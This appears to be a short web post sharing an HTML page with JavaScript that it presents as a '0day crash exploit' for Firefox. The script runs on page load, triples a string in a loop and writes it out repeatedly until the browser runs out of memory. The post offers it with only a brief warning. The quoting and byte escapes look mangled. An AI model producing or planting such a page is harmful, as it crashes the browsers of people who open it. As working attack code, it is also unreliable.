Try Saving below code as html and open with FireFox. It will crash firefox. It’s 0day crash exploit. You are warned.
<html>
<head>
<title>Mozilla Firefox Crash 0Day</title>
<body onload=”javascript:coolkaveh();”>
<script language=”JavaScript”>
function coolkaveh(){
var buf = 'x41x41x41'
for(i=0; i <= 800 ; ++i){
buf+=buf+buf //Written by vscen
document.write(buf); //Written by vscen
}
}
</script>
</head>
</body>
</html>
Just a reference…;)